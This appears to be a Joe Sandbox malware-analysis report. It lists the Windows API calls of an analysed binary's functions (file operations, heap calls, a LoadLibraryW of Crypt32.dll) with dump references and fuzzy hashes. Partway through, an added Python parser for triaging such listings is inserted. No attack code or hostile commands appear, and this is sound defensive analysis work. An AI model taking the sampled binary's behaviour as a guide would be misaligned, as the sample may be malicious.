                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 5353660e0434e771c8b0ed7f1cd3e2181be3edd9ea533872666ff1c593aded82
                                                                                                                                                                            • Instruction ID: bfbec0c63f6ff6d5e22a8a8a310bec3756a8e50f3c0c670dd0f99008b12105d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 5353660e0434e771c8b0ed7f1cd3e2181be3edd9ea533872666ff1c593aded82
                                                                                                                                                                            • Instruction Fuzzy Hash: D34137B1805B409EE724DF798885AE6FBE6FF19300F544A2ED5EE83282CB366554CB11
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FF8516: GetLastError.KERNEL32(?,010100E0,00FF3394,010100E0,?,?,00FF2E0F,?,?,010100E0), ref: 00FF851A
                                                                                                                                                                              • Part of subcall function 00FF8516: _free.LIBCMT ref: 00FF854D
                                                                                                                                                                              • Part of subcall function 00FF8516: SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF858E
                                                                                                                                                                              • Part of subcall function 00FF8516: _abort.LIBCMT ref: 00FF8594
                                                                                                                                                                              • Part of subcall function 00FFA7D1: _abort.LIBCMT ref: 00FFA803
                                                                                                                                                                              • Part of subcall function 00FFA7D1: _free.LIBCMT ref: 00FFA837
                                                                                                                                                                              • Part of subcall function 00FFA446: GetOEMCP.KERNEL32(00000000,?,?,00FFA6CF,?), ref: 00FFA471
                                                                                                                                                                            • _free.LIBCMT ref: 00FFA72A
                                                                                                                                                                            • _free.LIBCMT ref: 00FFA760
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2991157371-0
                                                                                                                                                                            • Opcode ID: c198be3fd69c6bac0e10fe0ddf45a1f99fdbc5723a468fc46286a352559ca7fb
                                                                                                                                                                            • Instruction ID: 5800947ac8c633864641c050c36240b1b2373ebb1f85692a3978089c939e7701
                                                                                                                                                                            • Opcode Fuzzy Hash: c198be3fd69c6bac0e10fe0ddf45a1f99fdbc5723a468fc46286a352559ca7fb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5031A472D0420CAFDB11FBA8D881B79B7F4DF40360F254099E6089B2B1EB7A5E41EB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FD9BF3,?,?,00FD76AC), ref: 00FD95B0
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FD9BF3,?,?,00FD76AC), ref: 00FD95E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: ed8d9ac9ddeaba694ff9f5c196f7cdff9aba18992dcd262e65e80d7672ff6067
                                                                                                                                                                            • Instruction ID: f23d2ca59e311ca12740d4559f1e4ee5eb7c5da352c26f3567021b9e41c4ae33
                                                                                                                                                                            • Opcode Fuzzy Hash: ed8d9ac9ddeaba694ff9f5c196f7cdff9aba18992dcd262e65e80d7672ff6067
                                                                                                                                                                            • Instruction Fuzzy Hash: 86213AB1408348AFE7318F54DC45BA777E9EB45364F08492EF5D5822C2C3B9AC48EB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00FD738C,?,?,?), ref: 00FD9A98
                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 00FD9B48
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$BuffersFlushTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1392018926-0
                                                                                                                                                                            • Opcode ID: b312acef44cd49da49875c4daef4bf41cc4417bd317b8bf5b58d81a0ed7cb323
                                                                                                                                                                            • Instruction ID: d7d6904eb9ad1cf1164f8ca6bbc5a835e3999854824b55c4e82ca04ee82b5f8c
                                                                                                                                                                            • Opcode Fuzzy Hash: b312acef44cd49da49875c4daef4bf41cc4417bd317b8bf5b58d81a0ed7cb323
                                                                                                                                                                            • Instruction Fuzzy Hash: 8121E73264C386AFC711DF64C891AABBBD5AF91314F08091EB8C0C7241D7ADDD48E791
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00FD9B8D
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00FD9B99
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                            • Opcode ID: 0f79ddaeca8bed68c3c49e74000ed0bc97e5d98405b25acba6b4df5aef0d35d4
                                                                                                                                                                            • Instruction ID: 75b8b93fe2185113c1ec8a405262095b8c8b60b82e4ee29ebd9e454e1bdc850c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f79ddaeca8bed68c3c49e74000ed0bc97e5d98405b25acba6b4df5aef0d35d4
                                                                                                                                                                            • Instruction Fuzzy Hash: B70180717042006BD7349E69EC8876AB6DBAB84324F19453FB182C2784CAB5D948D621
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(000000FF,?,?,?), ref: 00FD9957
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00FD9964
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
APIs
• _free.LIBCMT ref: 00FF7B99
  • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
• HeapReAlloc.KERNEL32(00000000,?,?,?,?,010100E0,00FDCB18,?,?,?,?,?,?), ref: 00FF7BD5
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 00FE0581
• GetProcessAffinityMask.KERNEL32(00000000), ref: 00FE0588
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
APIs
• SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA143
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA174
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
APIs
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
APIs
• DeleteFileW.KERNEL32(?,?,?,00FD9648,?,?,00FD94A3), ref: 00FD9E29
• DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00FD9648,?,?,00FD94A3), ref: 00FD9E57
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
APIs
• GetFileAttributesW.KERNEL32(?,?,?,00FD9E74,?,00FD74F7,?,?,?,?), ref: 00FD9E90
• GetFileAttributesW.KERNEL32(?,?,?,00000800,?,00FD9E74,?,00FD74F7,?,?,?,?), ref: 00FD9EBC
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
• LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1175261203-0
                                                                                                                                                                            • Opcode ID: 3fe0d3aa02d186d882eba167e9e8de56483ecee7002a6c155aff0b1d90a4da7b
                                                                                                                                                                            • Instruction ID: b2e059278cdfd2ae40c6afc27ff442a4770b1d4b910320e30f69efb57cfab214
                                                                                                                                                                            • Opcode Fuzzy Hash: 3fe0d3aa02d186d882eba167e9e8de56483ecee7002a6c155aff0b1d90a4da7b
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DE0487690025C6BDB21DB95DC08FEA776DEF0C391F4800A6B948D2105DA79D944DBF1
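The function blocks in this listing (API call lines, memory-dump source, IDA-plugin snapshot, similarity IDs and fuzzy hashes) repeat in a fixed shape, which makes them easy to turn into records for triage instead of reading them one by one. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It runs over a constructed, trimmed copy of four entries from this page (the GetSystemDirectoryW/LoadLibraryW entry above, the GdiplusShutdown/CoUninitialize entry, the vcruntime entry with a "Part of subcall function" line, and an entry whose APIs list is empty), keeps subcall lines separate from the function's own calls, pulls literal `.dll` names out of LoadLibrary* arguments, and flags functions that resolve the system directory and call LoadLibrary* themselves. The record field names and the `explicit_system_dir_loads` heuristic are the example's own assumptions, not Joe Sandbox terminology.

```python
"""Parse the per-function blocks of a Joe Sandbox disassembly listing into records
and run a small triage query over them. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: a trimmed copy of four entries from this listing, in the report's own shape.
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
• LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• Instruction Fuzzy Hash: 6DE0487690025C6BDB21DB95DC08FEA776DEF0C391F4800A6B948D2105DA79D944DBF1
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,01001161,000000FF), ref: 00FE9B31
• CoUninitialize.COMBASE(?,?,?,01001161,000000FF), ref: 00FE9B36
Similarity
• API ID: GdiplusShutdownUninitialize
APIs
  • Part of subcall function 00FF281A: try_get_function.LIBVCRUNTIME ref: 00FF282F
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF1744
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FF174F
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
APIs
Similarity
• API ID: ItemShowWindow
"""

@dataclass
class ApiCall:
    name: str                      # e.g. LoadLibraryW
    module: str                    # KERNEL32, or LIBCMT/LIBVCRUNTIME for statically linked CRT code
    args: List[str]                # as printed; '?' marks a value the analysis could not resolve
    ref: str                       # address of the call site
    subcall: Optional[str] = None  # callee address when the line reads "Part of subcall function"

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    snapshot_file: str = ""
    similarity: Dict[str, str] = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes ...

SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w?@$]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")

def parse_report(text: str) -> List[FunctionEntry]:
    """Each block opens with 'APIs'; a block with no call lines still yields a record."""
    entries: List[FunctionEntry] = []
    section = None
    for line in (ln.strip() for ln in text.splitlines()):
        if line in SECTIONS:
            section = line
            if section == "APIs":
                entries.append(FunctionEntry())
        elif not entries:
            continue  # text before the first block (page header etc.)
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            entries[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section != "APIs" and (m := KV_RE.match(line)):
            key, val = m["key"].strip(), m["val"].strip()
            if key == "Source File":      # 'Associated' dump lines are not needed for triage
                entries[-1].source_file = val
            elif key == "Snapshot File":
                entries[-1].snapshot_file = val
            elif section == "Similarity":
                entries[-1].similarity[key] = val
    return entries

def loaded_dlls(entry: FunctionEntry) -> Set[str]:
    """Literal module names visible among the LoadLibrary* arguments of one function."""
    return {a for c in entry.apis if c.name.startswith("LoadLibrary")
            for a in c.args if a.lower().endswith(".dll")}

def explicit_system_dir_loads(entries: List[FunctionEntry]) -> List[Tuple[str, List[str]]]:
    """Functions whose own code (subcalls excluded) resolves the system directory and then calls
    LoadLibrary*: the shape of a full-path load, to be confirmed in the disassembly (path arg is '?')."""
    hits = []
    for e in entries:
        own = {c.name for c in e.apis if c.subcall is None}
        if "GetSystemDirectoryW" in own and any(n.startswith("LoadLibrary") for n in own):
            hits.append((e.similarity.get("API ID", ""), sorted(loaded_dlls(e))))
    return hits

ENTRIES = parse_report(SAMPLE)
if __name__ == "__main__":
    for e in ENTRIES:
        print(e.similarity.get("API ID"), [c.name for c in e.apis], explicit_system_dir_loads([e]))
```

Two caveats when reading the result. First, the listing prints unresolved arguments as `?`, and the `Crypt32.dll` token sits at stack slot 8 of a one-argument API, so it may belong to an enclosing frame rather than to this call; the triage hit only says "look at the call at 00FDFD3A", not that the function loads Crypt32.dll by full path. Second, in every entry on this page the Opcode Fuzzy Hash equals the Opcode ID, so clustering similar functions across samples is better keyed on the Instruction Fuzzy Hash.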
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,01001161,000000FF), ref: 00FE9B31
                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,01001161,000000FF), ref: 00FE9B36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856339756-0
                                                                                                                                                                            • Opcode ID: 20baa78c2fe2d0ac6901194560b55589ab5b3affd01e92f73d46060e6b2dffc2
                                                                                                                                                                            • Instruction ID: a16876bb9ae2581a3813f915ab6c96951c1ed3dbc462a1e8f6f7b74231113dd4
                                                                                                                                                                            • Opcode Fuzzy Hash: 20baa78c2fe2d0ac6901194560b55589ab5b3affd01e92f73d46060e6b2dffc2
                                                                                                                                                                            • Instruction Fuzzy Hash: 84E04F32544684EFC721DF88DC46B56B7E8FB49B20F004769F81983B54CB796800CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FF281A: try_get_function.LIBVCRUNTIME ref: 00FF282F
                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF1744
                                                                                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FF174F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 806969131-0
                                                                                                                                                                            • Opcode ID: 1c7c4f13bb8cd5a44a2e04336aef757963c21bc76331c5aa449d8d90defe3b7a
                                                                                                                                                                            • Instruction ID: 8e8dd0097fa0e56fe17fa31c950c8be60821507bfbc785dea6dece7fa33b7e3d
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7c4f13bb8cd5a44a2e04336aef757963c21bc76331c5aa449d8d90defe3b7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 43D0A72794430D844E0036B46C1257527487D11BB0BA04747F324DE0F2EF288005B525
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemShowWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3351165006-0
                                                                                                                                                                            • Opcode ID: fa25da9112a999f7c026a353729bd0c9f17e20b5737afea6e29949e735e95d34
                                                                                                                                                                            • Instruction ID: 357c4d3993a33d0958b0c61eb6a819c68c95b48b5b7dd48624f705fe588b9bd3
                                                                                                                                                                            • Opcode Fuzzy Hash: fa25da9112a999f7c026a353729bd0c9f17e20b5737afea6e29949e735e95d34
                                                                                                                                                                            • Instruction Fuzzy Hash: 55C01272058200BECB021BF0DC09D3EBBA8ABA4212F04C90CB0E5C00A8C63EC010DB21
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00FD12A2
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00FD12A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherItemUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4250310104-0
                                                                                                                                                                            • Opcode ID: 4d60f86c37461706cdaf0d1e7058abfc2f38ba7fde40c1167b226509a9d052e5
                                                                                                                                                                            • Instruction ID: d784d56e5553eb83d95c75679c3e2953ffb76cdddfee372218dca4d2b0c58217
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d60f86c37461706cdaf0d1e7058abfc2f38ba7fde40c1167b226509a9d052e5
                                                                                                                                                                            • Instruction Fuzzy Hash: E3C04C76408240BFCB125BE09808D3FBFAAAB98312F04C80DB1E580028C73A8510DB21
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 7774b5247e718b8d778ee8e46b15c6b54c5262b9a4d4b0e1dee9b9468aa8539f
